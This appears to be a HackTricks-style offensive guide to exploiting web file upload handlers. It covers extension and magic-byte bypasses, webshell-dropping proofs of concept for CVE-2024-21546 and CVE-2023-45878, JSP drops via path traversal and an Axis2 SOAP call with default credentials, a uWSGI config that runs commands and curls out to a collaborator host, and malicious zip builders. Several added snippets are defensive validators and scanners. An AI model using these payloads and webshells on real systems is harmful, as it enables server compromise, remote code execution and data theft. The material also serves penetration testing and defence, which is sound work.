File Upload
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
File Upload General Methodology
Other useful extensions:
- PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
- Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc_, .hphp_, .ctp_
- ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
- Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
- Coldfusion: .cfm, .cfml, .cfc, .dbm
- Flash: .swf
- Perl: .pl, .cgi
- Erlang Yaws Web Server: .yaws
Bypass file extensions checks
- If they apply, check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr …
- Check adding a valid extension before the execution extension (use the previous extensions also):
- file.png.php
- file.png.Php5
- Try adding special characters at the end. You could use Burp to bruteforce all the ASCII and Unicode characters. (Note that you can also try to use the previously mentioned extensions)
- file.php%20
- file.php%0a
- file.php%00
- file.php%0d%0a
- file.php/
- file.php.\
- file.
- file.php….
- file.pHp5….
- Try to bypass the protections by tricking the server-side extension parser with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
- file.png.php
- file.png.pHp5
- file.php#.png
- file.php%00.png
- file.php\x00.png
- file.php%0a.png
- file.php%0d%0a.png
- file.phpJunk123png
- Add another layer of extensions to the previous check:
- file.png.jpg.php
- file.php%00.png%00.jpg
- Try to put the exec extension before the valid extension and pray that the server is misconfigured. (useful to exploit Apache misconfigurations where anything with the extension .php, but not necessarily ending in .php, will execute code):
- ex: file.php.png
- Using NTFS alternate data streams (ADS) on Windows. In this case, a colon character ":" is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (e.g. "file.asp::$data.")
- Try to break the filename limits. The valid extension gets cut off and the malicious PHP is left. AAA<--SNIP-->AAA.php
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check in the response how many characters it allows. Let's say 236
python3 -c 'print("A" * 232)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png
UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546
Some upload handlers trim or normalize trailing dots from the saved filename. In UniSharp's Laravel Filemanager (unisharp/laravel-filemanager) versions before 2.9.1, you can bypass the extension validation by:
- Using a valid image MIME and magic header (e.g., PNG's \x89PNG\r\n\x1a\n).
- Naming the uploaded file with a PHP extension followed by a dot, e.g., shell.php.
- The server strips the trailing dot and persists shell.php, which will execute if stored under a web-served directory (default public storage like /storage/files/).
Basic PoC (Burp Repeater):
POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
Then access the stored path (typical in Laravel + LFM):
GET /storage/files/0xdf.php?cmd=id
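An added example, not code from the page or from UniSharp's project, pulling the bypass list above and the trailing-dot case together: three weak extension checks commonly found in upload handlers, a model of what the storage layer does to the name (NUL truncation, the 255-byte cut, trailing-dot stripping), and a hardened validator that rejects every payload. The checks, the stored-name model and the payload set are constructed assumptions about typical PHP/Apache stacks; the same "validate the full name, store a shorter one" mismatch is what the wget 236-character trick later on this page relies on.

```python
import hashlib
import re
from typing import Optional

ALLOWED = {"png", "jpg", "jpeg", "gif"}
# Extensions the web server hands to the PHP interpreter (subset of the list above).
PHP_EXTS = {"php", "php5", "phtml", "phar", "inc"}

# --- three weak checks commonly found in upload handlers --------------------
def weak_blocklist(name: str) -> bool:
    """Accept unless the name ends in '.php' (case-insensitive)."""
    return not name.lower().endswith(".php")

def weak_substring(name: str) -> bool:
    """Accept if an allowed extension appears anywhere in the name."""
    return any("." + ext in name.lower() for ext in ALLOWED)

def weak_endswith(name: str) -> bool:
    """Accept if the name ends with an allowed extension."""
    return name.lower().endswith(tuple("." + ext for ext in ALLOWED))

# --- what actually lands on disk (assumed, typical stack behaviour) ---------
def stored_name(name: str, max_len: int = 255) -> str:
    """C-string APIs stop at the first NUL, the name is cut to the filesystem
    limit, and some stacks (UniSharp LFM, Windows) strip trailing dots/spaces."""
    name = name.split("\x00", 1)[0]
    return name[:max_len].rstrip(". ")

def executes(stored: str, lax_apache: bool = False) -> bool:
    """Strict: only the last extension counts. lax_apache: AddHandler-style
    config where any '.php' segment in the name triggers the interpreter."""
    parts = stored.lower().split(".")[1:]
    if lax_apache:
        return any(p in PHP_EXTS for p in parts)
    return bool(parts) and parts[-1] in PHP_EXTS

# --- hardened check: allowlist the last extension, drop the client's name ---
def secure_filename(name: str) -> Optional[str]:
    if re.search(r"[\x00-\x1f\x7f/\\]", name):      # control bytes, separators
        return None
    if name.count(".") != 1:                         # exactly one extension
        return None
    stem, ext = name.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    # Server-chosen name; the client's stem only seeds it and is never reused.
    return hashlib.sha256(name.encode()).hexdigest()[:16] + "." + ext

# Constructed payloads, URL-decoded as the application sees them.
PAYLOADS = [
    "avatar.png",
    "file.pHp5",
    "file.png.php",
    "file.php\x00.png",
    "file.php.",
    "file.phtml",
    "A" * 251 + ".php.png",   # 259 chars: '.png' falls off the 255-byte limit
]

def audit(payloads=PAYLOADS) -> dict:
    """Per payload: which checks accept it, what gets stored, and whether
    the stored name would be executed."""
    report = {}
    for p in payloads:
        stored = stored_name(p)
        report[p] = {
            "blocklist": weak_blocklist(p),
            "substring": weak_substring(p),
            "endswith": weak_endswith(p),
            "secure": secure_filename(p) is not None,
            "stored": stored,
            "runs_strict": executes(stored),
            "runs_lax": executes(stored, lax_apache=True),
        }
    return report

if __name__ == "__main__":
    for name, row in audit().items():
        print(repr(name[:24]), row)
```

Every payload except avatar.png gets through at least one weak check, and after the storage step each of them would run under the strict rule (last extension only); the only check that stops all of them is the one that looks at the last extension, refuses extra dots and control bytes, and throws the client's name away.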
Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass Content-Type checks by setting the value of the Content-Type header to: image/png, text/plain, application/octet-stream
- Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
- Bypass magic number checks by adding at the beginning of the file the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
or you could also introduce the payload directly in an image:
echo '<?php system($_REQUEST["cmd"]); ?>' >> img.png
- If compression is being added to your image, for example using some standard PHP libraries like PHP-GD, the previous techniques won't be useful. However, you could use the PLTE chunk technique defined here to insert some text that will survive compression.
- Github with the code
- The web page could also be resizing the image, using for example the PHP-GD functions imagecopyresized or imagecopyresampled. However, you could use the IDAT chunk technique defined here to insert some text that will survive compression.
- Github with the code
- Another technique to make a payload that survives an image resizing, using the PHP-GD function thumbnailImage. However, you could use the tEXt chunk technique defined here to insert some text that will survive compression.
- Github with the code
Other Tricks to check
- Find a vulnerability to rename the file already uploaded (to change the extension).
- Find a Local File Inclusion vulnerability to execute the backdoor.
- Possible Information disclosure:
- Upload several times (and at the same time) the same file with the same name
- Upload a file with the name of a file or folder that already exists
- Uploading a file with "." , "..", or "…" as its name. For instance, in Apache on Windows, if the application saves the uploaded files in the "/www/uploads/" directory, the "." filename will create a file called "uploads" in the "/www/" directory.
- Upload a file that may not be deleted easily such as "…:.jpg" in NTFS. (Windows)
- Upload a file on Windows with invalid characters such as |<>*?" in its name. (Windows)
- Upload a file on Windows using reserved (forbidden) names such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
- Try also to upload an executable (.exe) or an .html (less suspicious) that will execute code when accidentally opened by the victim.
Special extension tricks
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
The .phar files are like the .jar for java, but for php, and can be used like a php file (executing it with php, or including it inside a script...)
The .inc extension is sometimes used for php files that are only used to import files, so, at some point, someone could have allowed this extension to be executed.
Jetty RCE
If you can upload a XML file into a Jetty server you can obtain RCE because new *.xml and *.war are automatically processed. So, as shown in the following image, upload the XML file to $JETTY_BASE/webapps/ and expect the shell!
[image: XML upload into $JETTY_BASE/webapps/ yielding a shell]
uWSGI RCE
For a detailed examination of this vulnerability check the original research: uWSGI RCE Exploitation.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the .ini configuration file. uWSGI configuration files leverage a specific syntax to incorporate “magic” variables, placeholders, and operators. Notably, the ‘@’ operator, utilized as @(filename), is designed to include the contents of a file. Among the various supported schemes in uWSGI, the “exec” scheme is particularly potent, allowing the reading of data from a process’s standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is processed.
Consider the following example of a harmful uwsgi.ini file, showcasing various schemes:
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.
It's crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the discussed payload can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
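As an added example (not from the page or from uWSGI itself), a small scanner that finds `@(scheme://...)` magic includes in an uploaded blob even when the `[uwsgi]` section is buried inside a binary file, which is the case the previous paragraph warns about. The set of dangerous schemes comes from the ini above, the sample blob is constructed, and the parser is a heuristic for triage, not uWSGI's own loader.

```python
import re

# key = @(scheme://arg) as written in the ini above; everything after the
# scheme is attacker data handed to uWSGI's magic-include handlers.
MAGIC_INCLUDE = re.compile(rb"@\((?P<scheme>[a-z]+)://(?P<arg>[^)]*)\)")
# Schemes from the example ini that read processes, sockets, fds or symbols.
DANGEROUS = {b"exec", b"call", b"http", b"fd", b"sym"}

def find_uwsgi_includes(blob: bytes) -> list:
    """Return (key, scheme, arg) for every 'key = @(scheme://arg)' line that
    follows a [uwsgi] header, wherever that header sits in the blob
    (image bytes, PDF objects or anything else may precede it)."""
    start = blob.find(b"[uwsgi]")
    if start == -1:
        return []
    hits = []
    for line in blob[start:].splitlines():
        line = line.strip()
        if line.startswith(b";") or b"=" not in line:     # comments / non-assignments
            continue
        key, _, value = line.partition(b"=")
        for m in MAGIC_INCLUDE.finditer(value):
            hits.append((key.strip(), m.group("scheme"), m.group("arg")))
    return hits

def is_dangerous(blob: bytes) -> bool:
    """True if any include uses a scheme that executes or reaches out."""
    return any(scheme in DANGEROUS for _, scheme, _ in find_uwsgi_includes(blob))

# Constructed: PNG signature plus padding, then the malicious ini from above.
SAMPLE = (b"\x89PNG\r\n\x1a\n" + b"\x00" * 32 +
          b"[uwsgi]\n"
          b"; read from a process stdout\n"
          b"body = @(exec://whoami)\n"
          b"; curl to exfil via collaborator\n"
          b"extra = @(exec://curl http://collaborator-unique-host.oastify.com)\n"
          b"characters = @(call://uwsgi_func)\n")

if __name__ == "__main__":
    for key, scheme, arg in find_uwsgi_includes(SAMPLE):
        print(key.decode(), scheme.decode(), arg.decode())
    print("dangerous:", is_dangerous(SAMPLE))
```

Running this over every file written into a directory that uWSGI may reload from, rather than only over files ending in .ini, is the point: the loader does not care what the first bytes of the file are.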
Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
An unauthenticated endpoint in Gibbon LMS allows arbitrary file write inside the web root, leading to pre-auth RCE by dropping a PHP file. Affected versions: up to and including 25.0.01.
- Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
- Method: POST
- Required params:
  - img: data-URI-like string [mime];[name],[base64] (the server ignores type/name and base64-decodes the last part)
  - path: destination filename relative to the Gibbon install dir (e.g., poc.php or 0xdf.php)
  - gibbonPersonID: any non-empty value is accepted (e.g., 0000000001)
Minimal PoC to write and read a file:
# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK
# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
# Verify write
curl http://target/Gibbon-LMS/poc.php
Drop a minimal webshell and execute commands:
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
Notes:
- The handler performs base64_decode($_POST["img"]) after splitting on ; and ,, then writes the bytes to $absolutePath . '/' . $_POST['path'] without validating extension/type.
- The resulting code runs as the web service user (for example, XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
wget File Upload/SSRF Trick
On some occasions you may find that a server is using wget to download files and you can indicate the URL. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, this check can be bypassed.
The maximum length of a filename in linux is 255, however, wget truncates the filenames to 236 characters. You can download a file called "A"*232+".php"+".gif"; this filename will bypass the check (as in this example ".gif" is an allowed extension) but wget will rename the file to "A"*232+".php".
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
Note that another option you may be thinking of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL will bypass the check but then wget will download the redirected file with the new name. This won't work unless wget is being used with the parameter --trust-server-names because wget will download the redirected page with the name of the file indicated in the original URL.
Escaping the upload directory with NTFS junctions (Windows)
(For this attack you will need local access to the Windows machine) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>) and you control the creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads are then written into the target path, allowing code execution if the target interprets server-side code.
Example flow to redirect uploads into the XAMPP webroot:
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
:: Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs
:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
:: Minimal PHP webshell for testing
:: <?php echo shell_exec($_REQUEST['cmd']); ?>
:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"
Notes
- mklink /J creates an NTFS directory junction (reparse point). The web server account must follow the junction and have write permission on the destination.
- This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
- Defenses: do not let writable upload roots be attacker-controllable under C:\Windows\Tasks or similar; prevent junction creation; validate extensions server-side; store uploads on a separate volume or with deny-execute ACLs.
GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)
Some upload/ingest handlers write the raw request body to a filesystem path built from user-controlled query parameters. If the handler also supports Content-Encoding: gzip and fails to canonicalize/validate the destination path, you can combine directory traversal with a gzipped payload to write arbitrary bytes into a web-served directory and get RCE (for example, drop a JSP under Tomcat's webapps).
Generic exploitation flow:
- Prepare the server-side payload (e.g., a minimal JSP webshell) and gzip-compress the bytes.
- Send a POST where the path parameter (e.g., token) contains directory traversal that escapes the intended folder, and file indicates the filename to store. Set Content-Type: application/octet-stream and Content-Encoding: gzip; the body is the compressed payload.
- Visit the dropped file to trigger execution.
Illustrative request:
POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>
<gzip-compressed-bytes-of-your-jsp>
Then request the dropped JSP:
GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target
Notes
- Target paths differ by deployment (e.g., /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ in some stacks). Any web-exposed folder that executes JSP will do.
- Burp Suite's Hackvertor extension can generate a correct gzip body from your payload.
- This is a clean pre-auth arbitrary file write → RCE pattern; it does not depend on multipart parsing.
Mitigations
- Decide upload locations server-side; never trust path fragments from clients.
- Canonicalize and enforce that the resolved path stays inside an allowlisted base directory.
- Store uploads on a non-executable volume and strip script execution from writable paths.
Axis2 SOAP uploadFile traversal to Tomcat webroot (JSP drop)
Axis2-based upload services sometimes expose a SOAP uploadFile action that takes three attacker-controlled fields: jobDirectory (destination directory), archiveName (filename), and dataHandler (base64 file content). If jobDirectory is not canonicalized, you get arbitrary file write via path traversal and can drop a JSP into Tomcat's webapps.
Minimal request outline (default credentials often work: admin / trubiquity):
POST /services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
<soapenv:Body>
<updw:uploadFile>
<updw:login>admin</updw:login>
<updw:password>trubiquity</updw:password>
<updw:archiveName>shell.jsp</updw:archiveName>
<updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
<updw:dataHandler>PD8lQCBwYWdlIGltcG9ydD0iamF2YS5pby4qIjsgc3lzdGVtKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7Pz4=</updw:dataHandler>
</updw:uploadFile>
</soapenv:Body>
</soapenv:Envelope>
- Bindings are often localhost-only; pair it with a full-read SSRF (absolute-URL request line, Host header ignored) to reach 127.0.0.1 if the Axis2 port is not exposed.
- After writing, browse /trufusionPortal/jsp/shell.jsp?cmd=id to execute.
Tools
- Upload Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Corrupting upload indices with snprintf quirks (historical)
Some legacy upload handlers that use snprintf() or similar to build multi-file arrays from a single-file upload can be tricked into forging the _FILES structure. Due to inconsistencies and truncation in snprintf() behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this "index corruption" pattern occasionally resurfaces in CTFs and older codebases.
From File upload to other vulnerabilities
- Set filename to ../../../tmp/lol.png and try to achieve a path traversal
- Set filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection
- Set filename to <svg onload=alert(document.domain)> to achieve a XSS
- Set filename to ; sleep 10; to test some command injection (more command injection tricks here)
- XSS in image (svg) file upload
- JS file upload + XSS = Service Workers exploitation
- XXE in svg upload
- Open Redirect via uploading svg file
- Try different svg payloads from https://github.com/allanlw/svg-cheatsheet
- Famous ImageTrick vulnerability
- If you can indicate the web server to catch an image from a URL you could try to abuse a SSRF. If this image is going to be saved in some public site, you could also indicate a URL from https://iplogger.org/invisible/ and steal information of every visitor.
- XXE and CORS bypass with PDF-Adobe upload
- Specially crafted PDFs for XSS: the following page shows how to inject PDF data to obtain JS execution (see ../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare a PDF that will execute arbitrary JS following the given instructions.
- Upload the [eicar](https://secure.eicar.org/eicar.com.txt) content to check if the server has any antivirus
- Check if there is any size limit when uploading files
Here's a top 10 list of things that you can achieve by uploading (from here):
- ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
- SVG: Stored XSS / SSRF / XXE
- GIF: Stored XSS / SSRF
- CSV: CSV injection
- XML: XXE
- AVI: LFI / SSRF
- HTML / JS : HTML injection / XSS / Open redirect
- PNG / JPEG: Pixel flood attack (DoS)
- ZIP: RCE via LFI / DoS
- PDF / PPTX: SSRF / BLIND XXE
Burp Extension
GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy · GitHub
Magic Header Bytes
- PNG: "\x89PNG\r\n\x1a\n" (the 8-byte signature, immediately followed by the IHDR chunk)
- JPG: "\xff\xd8\xff"
Refer to https://en.wikipedia.org/wiki/List_of_file_signatures for other filetypes.
Zip/Tar File Automatically decompressed Upload
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
Symlink
Upload an archive containing soft links to other files; then, accessing the decompressed files you will access the linked files:
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
Decompress in different folders
The unexpected creation of files in directories during decompression is a significant issue. Despite initial assumptions that this setup might guard against OS-level command execution via malicious file uploads, the hierarchical compression support and directory traversal capabilities of the ZIP archive format can be exploited. This allows attackers to bypass restrictions and escape secure upload directories by manipulating the decompression functionality of the targeted application.
An automated exploit to craft such files is available at evilarc on GitHub. The utility can be used as shown:
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
Additionally, the symlink trick with evilarc is an option. If the objective is to target a file like /flag.txt, a symlink to that file should be created in your system. This ensures that evilarc does not encounter errors during its operation.
Below is an example of Python code used to create a malicious zip file:
#!/usr/bin/env python3
import zipfile
from io import BytesIO

def create_zip():
    f = BytesIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    # The entry name carries the traversal; whether it is honoured is up to the extractor
    z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
    z.writestr('otherfile.xml', 'Content of the file')
    z.close()
    with open('poc.zip', 'wb') as out:
        out.write(f.getvalue())

create_zip()
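An added example, not the page's or evilarc's code, of the defensive side of this section and of the NTFS-junction and traversal sections above: an extractor that refuses entries escaping the destination (traversal, absolute names, symlink entries) and an upload-path resolver that refuses a per-user folder that has been replaced by a link. A Unix symlink stands in for the Windows junction; the directory names and the archive contents are constructed.

```python
import io
import os
import pathlib
import stat
import tempfile
import zipfile
from typing import Optional

def inside(root: pathlib.Path, target: pathlib.Path) -> bool:
    """True only if target's fully resolved path (links followed) is under
    the resolved root."""
    try:
        target.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False

def safe_extract(zip_bytes: bytes, dest: str) -> dict:
    """Extract only entries that stay inside dest; refuse traversal,
    absolute names and symlink entries (the other trick in this section)."""
    dest_p = pathlib.Path(dest)
    written, refused = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            name = info.filename
            is_link = stat.S_ISLNK(info.external_attr >> 16)
            parts = pathlib.PurePosixPath(name).parts
            target = dest_p / name
            if (name.startswith(("/", "\\")) or ".." in parts or is_link
                    or not inside(dest_p, target)):
                refused.append(name)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(z.read(info))
            written.append(name)
    return {"written": written, "refused": refused}

def safe_upload_path(upload_root: str, user_folder: str,
                     filename: str) -> Optional[pathlib.Path]:
    """Refuse a per-user folder that is a symlink/junction, and any final
    path that resolves outside upload_root."""
    root = pathlib.Path(upload_root)
    folder = root / user_folder
    if folder.is_symlink():
        return None
    candidate = folder / filename
    return candidate if inside(root, candidate) else None

def demo() -> dict:
    """Constructed scenario: a traversal zip plus a symlink standing in for
    the junction C:\\Windows\\Tasks\\Uploads\\<id> -> webroot."""
    work = tempfile.mkdtemp()
    webroot = os.path.join(work, "htdocs")
    uploads = os.path.join(work, "uploads")
    os.mkdir(webroot)
    os.mkdir(uploads)

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:                  # like evilarc -d 2
        z.writestr("../../htdocs/shell.php", "<?php system($_REQUEST['cmd']); ?>")
        z.writestr("notes.txt", "benign")
    extract = safe_extract(buf.getvalue(), os.path.join(uploads, "job1"))

    os.symlink(webroot, os.path.join(uploads, "33d81ad5"))  # junction stand-in
    return {
        "extract": extract,
        "junction_blocked": safe_upload_path(uploads, "33d81ad5", "shell.php") is None,
        "normal_ok": safe_upload_path(uploads, "job2", "avatar.png") is not None,
        "shell_in_webroot": os.path.exists(os.path.join(webroot, "shell.php")),
    }

if __name__ == "__main__":
    print(demo())
```

The resolve-then-compare step is what closes both holes: lexical checks on `..` alone would miss the junction, and a symlink check alone would miss a traversal entry inside the archive.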
Abusing compression for file spraying
For more details check the original post in: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
- Creating a PHP Shell: PHP code is written to execute commands passed via the $_REQUEST variable.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
- File Spraying and Compressed File Creation: Multiple files are created and a zip archive is assembled containing these files.
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
